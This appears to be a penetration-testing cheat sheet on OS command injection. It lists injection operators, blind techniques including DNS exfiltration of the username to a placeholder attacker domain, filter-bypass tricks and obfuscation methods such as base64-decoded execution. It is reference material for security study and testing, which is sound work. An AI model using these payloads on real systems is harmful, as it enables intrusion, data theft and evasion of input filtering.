Command Injection

Occurs when improperly sanitized user input is used to perform operations. It allows the attacker to execute commands on the host operating system.

Types: In-Band and Blind.

Tools

Tool	Details
bashfuscator	Obfuscation Linux bashfuscator -l (list of techniques) bashfuscator -c "<COMMAND>" -s 1 -t 1 --no-mangling --layers 1
Invoke-DOSfuscation	Obfuscation Windows Import-Module .\Invoke-DOSfuscation.psd1 Invoke-DOSfuscation > SET COMMAND <COMMAND> > encoding > 1

Injection Operator

Operator	Character	URL-Encoded	Executed Command
Semicolon	;	%3b	Both
New Line	\	%0a	Both
Background	&	%26	Both (second output generally shown first)
Pipe	|	%7c	Both (only second output is shown)
AND	&&	%26%26	Both (only if first succeeds)
OR	||	%7c%7c	Second (only if first fails)
Sub-Shell	``	%60%60	Both (Linux-only)
Sub-Shell	$()	%24%28%29	Both (Linux-only)

Useful Commands

Purpose of command	Linux	Windows
Name of current user	whoami	whoami
Operating system	uname -a	ver
Network configuration	ifconfig	ipconfig /all
Network connections	netstat -an	netstat -an
Running processes	ps -ef	tasklist

Blind

Time Delay

... && sleep 10 &  # unix only

... && ping -c 10 127.0.0.1 &  # unix and windows

Web & DNS

... & whoami > /var/www/static/whoami.txt &

... & nslookup atacker.com &

... & nslookup `whoami`.atacker.com &

Bypassing Filters

Space

TAB	%09
IFS	$IFS ${IFS}
Bash Brace Expansion	{ls,-la}

Characters in Variables

Linux Environment Variables	printenv ${<VARIABLE>:<START>:<LENGTH>} ${PATH:0:1} or ${LS_COLORS:10:1}
Windows CMD	set %<VARIABLE>:~<START>,<LENGTH>% %HOMEPATH:~0,1% or %HOMEPATH:~6,-11%
Windows PowerShell	[Get-ChildItem/cgi/ls/dir] env: $env:<VARIABLE>[<CHAR>] $env:<VARIABLE>.Substring(<FROM>, <TO>) $env:HOMEPATH[0] or $env:HOMEPATH.Substring(0, 2)

Shift Characters

Shift 1 →	man ascii (take previous character X) $(tr '!-}' '"-~'<<<X)

Obfuscation

Linux

'' and "" in command name	w’h’oa’m’i w"h"oa"m"i
\ and $@ in command name	w\ho\a\mi wh$@oami
$() in command name	wh$()oami wh$(random)oami
Case-Sensitive ${VAR,,} takes the variable in lowercase, ${VAR^^} in uppercase	$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") $(a="WhOaMi";printf %s "${a,,}") (in /bin/bash) $(a="WhOaMi";echo ${a,,})
Inverse	echo 'whoami' | rev (get inverse) $(rev<<<'imaohw')
Encoding	bash<<<$(base64 -d<<<BASE64)

Windows

'' and "" in command name	w’h’oa’m’i w"h"oa"m"i
^ in command name	wh^oami
$() in command name	wh$()oami wh$(random)oami
Case-Insensitive	wHoAmi
Inverse	"whoami"[-1..-20] -join '' (get inverse) iex "$('imaohw'[-1..-20] -join '')"
Encoding	echo -n whoami | iconv -f utf-8 -t utf-16le | base64 (get base64 from linux) iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('BASE64')))"

Note: The commands seen can be written in many ways based on the filtered characters, try different ones (ex. | instead of <<< or sh for command execution)

# EXAMPLE
find /usr/share/ | grep root | grep mysql | tail -n 1
tail -n 1 <<< $(grep mysql <<< $(grep root <<< $(find /usr/share/)))
tail -n 1 <<<$(grep mysql <<<$(grep root <<<$(find /usr/share/)))
tail%09-n%091%09<<<$(grep%09mysql%09<<<$(grep%09root%09<<<$(find%09/usr/share/)))
ta$@il%09-n%091%09<<<$(gr$@ep%09mysql%09<<<$(gr$@ep%09root%09<<<$(fin$@d%09/usr/share/)))
ta$@il%09-n%091%09<<<$(gr$@ep%09mysql%09<<<$(gr$@ep%09root%09<<<$(fin$@d%09${PATH:0:1}usr${PATH:0:1}share${PATH:0:1})))
ta$%40il%09-n%091%09<<<$(gr$%40ep%09mysql%09<<<$(gr$%40ep%09root%09<<<$(fin$%40d%09${PATH:0:1}usr${PATH:0:1}share${PATH:0:1})))